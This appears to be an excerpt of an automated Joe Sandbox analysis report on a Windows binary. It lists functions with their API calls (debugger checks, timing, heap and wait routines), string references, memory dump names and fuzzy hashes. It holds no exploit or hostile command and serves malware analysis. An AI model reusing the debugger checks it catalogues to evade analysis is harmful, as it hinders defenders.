IsDebuggerPresent.KERNEL32(?,00829515,?,00000000,80131506,00DA3158), ref: 00762635
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000), ref: 0076264E
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000), ref: 00762658
IsDebuggerPresent.KERNEL32(?,00DA3158), ref: 0076269E
DebugBreak.KERNEL32(?,00DA3158), ref: 007626AC
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000,80131506,00DA3158), ref: 0076276D
SetErrorMode.KERNEL32(00000000,?,00829515,?,00000000,80131506,00DA3158), ref: 00762777

Strings

D::RFFE: About to call RaiseFailFastException, xrefs: 0076255F
D::RFFE: Return from RaiseFailFastException, xrefs: 007625AB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorMode$DebuggerPresent$_errno$BreakDebugExceptionFailFastFreeHeapRaisewcstoul
String ID: D::RFFE: About to call RaiseFailFastException$D::RFFE: Return from RaiseFailFastException
API String ID: 2811416661-485428011
Opcode ID: 47d580eb9e63620f97c12975fa612b5e14087cfa5568b93e144d216fe038ba5d
Instruction ID: 4b91f179b0a3ad36d68f552792537628c9fb9bde28da8e2f63592c32d793a60b
Opcode Fuzzy Hash: 47d580eb9e63620f97c12975fa612b5e14087cfa5568b93e144d216fe038ba5d
Instruction Fuzzy Hash: 86A1CC31B00B00DBDB64DF65DC99B6AB7A4EB05710F144169ED07AB3A2DB78AD02CB64

Function 007D6850 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 423COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,BBFE6088,?,?,00000000), ref: 007D6938
GetTickCount64.KERNEL32 ref: 007D69EB
GetTickCount.KERNEL32 ref: 007D6A54
SetEvent.KERNEL32(03450CB8,?,00000001,00000000,?,BBFE6088,?,?,00000000), ref: 007D6A8D
GetTickCount.KERNEL32 ref: 007D6AD2
GetTickCount.KERNEL32 ref: 007D6B6E
GetTickCount64.KERNEL32 ref: 007D6BA3
GetTickCount64.KERNEL32 ref: 007D6BE0
GetTickCount.KERNEL32 ref: 007D6C3B
QueryPerformanceCounter.KERNEL32(?,?,00000001,00000000,?,BBFE6088,?), ref: 007D6CEA
QueryPerformanceFrequency.KERNEL32(00DB65B0,?,BBFE6088,?), ref: 007D6D1F

Part of subcall function 008B4B70: GetLastError.KERNEL32(74FDD070,?,?,?,BBFE6088), ref: 008B4B7E

Strings

$h}, xrefs: 007D69A6, 007D6975, 007D695A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Tick$Count$Count64PerformanceQuery$Counter$ErrorEventFrequencyLast
String ID: $h}
API String ID: 4029637703-1133894400
Opcode ID: 97017900d9ef1d0d6da3091bda7791857ead7df3a78dbe08200567b985164fd8
Instruction ID: 6ecff8a288a15c70dc1f1270a9f671c737ab247fa610fecc5d78f26ffbd9ffb0
Opcode Fuzzy Hash: 97017900d9ef1d0d6da3091bda7791857ead7df3a78dbe08200567b985164fd8
Instruction Fuzzy Hash: 86027D70A00209DFDB14CF68D99479DBBB1FF49310F24812AE899EB391D779AD45CBA0

Function 007DB390 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 569synchronizationCOMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 007DB6F6
CoWaitForMultipleHandles.OLE32(-00000002,00000000,?,?,00000080), ref: 007DB776
WaitForMultipleObjectsEx.KERNEL32(?,?,BBFE6088,00000000,00000000,00000000,04000000,BBFE6088,00000000,0000002C), ref: 007DB7A6
GetTickCount64.KERNEL32 ref: 007DB7F9
GetLastError.KERNEL32 ref: 007DB839
WaitForSingleObject.KERNEL32(?,00000000), ref: 007DB884
GetTickCount64.KERNEL32 ref: 007DB8B8
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007DB989
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,007DB230), ref: 007DB9D3

Part of subcall function 007DBBC0: GetTickCount64.KERNEL32 ref: 007DBCB2
Part of subcall function 007DBBC0: SignalObjectAndWait.KERNEL32(?,?,?,BBFE6088,BBFE6088,0000002C), ref: 007DBCD6
Part of subcall function 007DBBC0: GetTickCount64.KERNEL32 ref: 007DBD2A

Strings

NotSupported_MaxWaitHandles_STA, xrefs: 007DBA2E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Count64TickWait$Object$MultipleSingle$ErrorHandlesLastObjectsSignalqsort
String ID: NotSupported_MaxWaitHandles_STA
API String ID: 296535545-4026452055
Opcode ID: da2dd2dee872c504121aabf025794c7e717bbabbf16b748c83cdc67e72e7f69b
Instruction ID: 5dba9e921660b5660573e9fc4cea8f5996249c1956a7f4421fd18dd4099888e6
Opcode Fuzzy Hash: da2dd2dee872c504121aabf025794c7e717bbabbf16b748c83cdc67e72e7f69b
Instruction Fuzzy Hash: 60328E71E00248CFDB24CFA8C854BADBBF5FF44314F25826AE819AB391D779A945CB50

Function 00975A10 Relevance: 16.7, APIs: 11, Instructions: 219memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001000,00000000,00000000,00000000,?,00001000,00000000,BBFE6088,?,00000000,00000000,00000000,00C4CBCB,000000FF,?,00975F39), ref: 00975A84
GetLastError.KERNEL32(?,00001000,00000000,BBFE6088,?,00000000,00000000,00000000,00C4CBCB,000000FF,?,00975F39,00000000,00000000,00000000,00000000), ref: 00975ACF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,-00000001,00000000,00000000,00000000,?,00000200,BBFE6088,?,00000000,00000000,00000000), ref: 00975B77
GetLastError.KERNEL32(?,00000000,00000000,00000000,00C4CBCB,000000FF,?,00975F39,00000000,00000000,00000000,00000000,?,00000000,?,00975F6F), ref: 00975B7F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00C4CBCB,000000FF,?,00975F39), ref: 00975BAE
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00C4CBCB,000000FF), ref: 00975BE2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00975C4D
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 00975C88
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00001000,00000000), ref: 00975CA4
HeapFree.KERNEL32(00000000,?), ref: 00975CC4
HeapFree.KERNEL32(00000000,?,?,00000200,BBFE6088,?,00000000,00000000,00000000,00C4CBCB,000000FF,?,00975F39,00000000,00000000,00000000), ref: 00975CEE

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapLast$FormatMessagewcscpy_s
String ID:
API String ID: 2570321710-0
Opcode ID: 41e69f4467a983cf784c3fa2da8ccd6526249d769ccc7e36f069a6716b718362
Instruction ID: f6c2de781fa0d34e93f1eb56ad4357517e0f659536e25590c1769a1ed6660eb3
Opcode Fuzzy Hash: 41e69f4467a983cf784c3fa2da8ccd6526249d769ccc7e36f069a6716b718362
Instruction Fuzzy Hash: 7081F331A00358ABEB709B65CC85BEE77B8EB04750F1486A9F959EA2D0D7F05E80CB54

Function 00A2A370 Relevance: 15.3, APIs: 10, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,00000000,?,00000001), ref: 00A2A3F1
GetProcessHeap.KERNEL32(00000000,?,00000001), ref: 00A2A43E
HeapAlloc.KERNEL32(03400000,00000000,00000030,00000000,?,00000001), ref: 00A2A456
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00A2A4A6
QueryPerformanceCounter.KERNEL32(?), ref: 00A2A4D1
GetProcessHeap.KERNEL32 ref: 00A2A543
HeapAlloc.KERNEL32(03400000,00000000,00000018), ref: 00A2A560
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A2A79D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Alloc$ProcessVirtual$CounterFreePerformanceQuerySleep
String ID:
API String ID: 2913782672-0
Opcode ID: f6fd7450cf60363064dabbb8a1155bc4931d04c122c2ae935b41fed9895caed9
Instruction ID: 73d0d4840fbb6208e1518e4e2fae5f7254746e51e41383255c1e72a8dc35c687
Opcode Fuzzy Hash: f6fd7450cf60363064dabbb8a1155bc4931d04c122c2ae935b41fed9895caed9
Instruction Fuzzy Hash: 02D188716047119FD714CF28E884B1AB7F0BFA8314F148A6DE889DB391EB74E845CB96

Function 00A215E0 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 550memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A2185E
HeapFree.KERNEL32(00000000,?), ref: 00A2191F
HeapFree.KERNEL32(00000000,?), ref: 00A219E2
HeapFree.KERNEL32(00000000,?), ref: 00A21B5F
HeapFree.KERNEL32(00000000,?), ref: 00A21C22
HeapFree.KERNEL32(00000000,?), ref: 00A21D28
HeapFree.KERNEL32(00000000,?), ref: 00A21DDA
HeapFree.KERNEL32(00000000,?), ref: 00A21DFC

Strings

NULL, xrefs: 00A2164E, 00A21668

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 31368a4acf69c6aac5176350f1465bfb2c3cd1c0cc623c82a0ae4e77a9ddb148
Instruction ID: 1c5aec3235bc2e766d674059b0b273242c4b550c2abcbe93ff0b80370b7c315f
Opcode Fuzzy Hash: 31368a4acf69c6aac5176350f1465bfb2c3cd1c0cc623c82a0ae4e77a9ddb148
Instruction Fuzzy Hash: FF327D71E002289BCF21DF28DC95BDAB7B8AF59344F1401E9E909A7352D770AE84CF90

Function 00A18D90 Relevance: 14.0, APIs: 8, Strings: 1, Instructions: 550memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A1900E
HeapFree.KERNEL32(00000000,?), ref: 00A190CF
HeapFree.KERNEL32(00000000,?), ref: 00A19192
HeapFree.KERNEL32(00000000,?), ref: 00A1930F
HeapFree.KERNEL32(00000000,?), ref: 00A193D2
HeapFree.KERNEL32(00000000,?), ref: 00A194D8
HeapFree.KERNEL32(00000000,?), ref: 00A1958A
HeapFree.KERNEL32(00000000,?), ref: 00A195AC

Strings

NULL, xrefs: 00A18DFE, 00A18E18

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 2aefc176725ebc7f0938ae5f4e72e1be167640ea4e696addcf7efcc662c579c2
Instruction ID: 34f704b0470a316ae7dae30df1766c505906fb489fe16cc0d8061af7be6c562f
Opcode Fuzzy Hash: 2aefc176725ebc7f0938ae5f4e72e1be167640ea4e696addcf7efcc662c579c2
Instruction Fuzzy Hash: 68327B71E002289BDB21DF24DC95BDAB7B8AF49344F0441E9E90DA7252DB70AEC5CF90

Function 007E96C0 Relevance: 12.5, APIs: 8, Instructions: 540memorystringCOMMON

Download Yara Rule

APIs

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 007E97CB
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000), ref: 007E98FB
HeapFree.KERNEL32(00000000,?,?), ref: 007E9A25
HeapFree.KERNEL32(00000000,?,?), ref: 007E9A4E
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9BCE
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9C93
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,BBFE6088,?,?), ref: 007E9DDA

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

HeapFree.KERNEL32(00000000,?,?,00000000,00000004), ref: 007E9ED3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Free$strcpy_s$AllocProcess
String ID:
API String ID: 2194611060-0
Opcode ID: 09edc9bef10ec76431abc594b323b456c81e2c4f20869966979971a7d00b8590
Instruction ID: 85e4faaee789b1caec6daad5fd17ccdfbc969ebf8267edde96229a425faf76fd
Opcode Fuzzy Hash: 09edc9bef10ec76431abc594b323b456c81e2c4f20869966979971a7d00b8590
Instruction Fuzzy Hash: 0D325BB2901268DBDB25CF25CC45BEDBBB4AF49310F0441D9EA49A7391DB74AE90CF90

Function 008C2C30 Relevance: 9.6, APIs: 6, Instructions: 622memorystringCOMMON

Download Yara Rule

APIs

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,00C731C4,?), ref: 008C2E0C

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,00C731C4,?), ref: 008C2EDA
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,00C731C4,?), ref: 008C3001
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,00D00A50,?,?,?,?,?,?,?,00000000), ref: 008C360E
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,00D00A50,?,?,?,?,?,?,?,00000000), ref: 008C3634
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,00D00A50,?,?,?,?,?,?,?,00000000), ref: 008C365D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strcpy_s
String ID:
API String ID: 2606610500-0
Opcode ID: b0992329e85896248bd8421afc2cffd16362c1805a6a03dad710cab7d97b02c8
Instruction ID: 79e0d98276afe94a1f69690e4a81e4d3434d55f0e1d869732b1cb01735398957
Opcode Fuzzy Hash: b0992329e85896248bd8421afc2cffd16362c1805a6a03dad710cab7d97b02c8
Instruction Fuzzy Hash: 365239B1900228AFEF259F14CD45BA9BBB6FB85304F0082D9F50DA7290DB725EA5DF50

Function 009D7A00 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

CreateSemaphoreExW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,00000000,02100002,BBFE6088,00000000,?), ref: 009D7AD1
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 009D7AEB
CloseHandle.KERNEL32(?), ref: 009D7B18
CloseHandle.KERNEL32(?), ref: 009D7B25
CloseHandle.KERNEL32(?), ref: 009D7B81
CloseHandle.KERNEL32(?), ref: 009D7B8E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandle$CreateHeap$AllocateEventProcessSemaphore
String ID:
API String ID: 9831839-0
Opcode ID: 73e359dbafecb4238b247ef6182b782169bc04dd62b170232c43463c976f22c7
Instruction ID: 80953aeed8b187baff6f6ebb89a575302ea4e4809a1f9faffc5de91d815f61b8
Opcode Fuzzy Hash: 73e359dbafecb4238b247ef6182b782169bc04dd62b170232c43463c976f22c7
Instruction Fuzzy Hash: C691AF71E493099BEB20CFA9C8057AEFBF4EF44720F14866ED855A73C0E77999408B94

Function 00A2F090 Relevance: 9.2, APIs: 6, Instructions: 245memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 00A2F0AE
HeapAlloc.KERNEL32(03400000,00000000,00000050,00000000,00000000,?,?,00000004,?,?,?,?,?,00000000,00000000,?), ref: 00A2F0C6
GetSystemTimeAsFileTime.KERNEL32(?,00000000), ref: 00A2F188
QueryPerformanceCounter.KERNEL32(?), ref: 00A2F1A0
GetProcessHeap.KERNEL32(00000000), ref: 00A2F1C2
HeapAlloc.KERNEL32(03400000,00000000,00000008,00000000), ref: 00A2F1DF

Part of subcall function 00A2D350: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00A2D398
Part of subcall function 00A2D350: HeapAlloc.KERNEL32(03400000,00000000,00000070,00000000,00000000,00000000), ref: 00A2D3B0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess$Time$CounterFilePerformanceQuerySystem
String ID:
API String ID: 3212095148-0
Opcode ID: f4b5ad04972f57cbfbb92d3a593a2e05e1a75150c15f17ad4118119295a804e1
Instruction ID: e8f5652ad8592fb85c9700ad71ae5333ac4034fb1be1c48df6202766564a0048
Opcode Fuzzy Hash: f4b5ad04972f57cbfbb92d3a593a2e05e1a75150c15f17ad4118119295a804e1
Instruction Fuzzy Hash: 95916876A00225CFDB24DF69E985BAE77B4AF49700F144179ED05AB385EB70ED00CBA0

Function 00992180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(BBFE6088,034268C8,?,?), ref: 009921C2
RaiseException.KERNEL32(04242420,00000000,00000003,'YA1), ref: 00992225

Strings

'YA1, xrefs: 00992218, 0099221B

Memory Dump Source

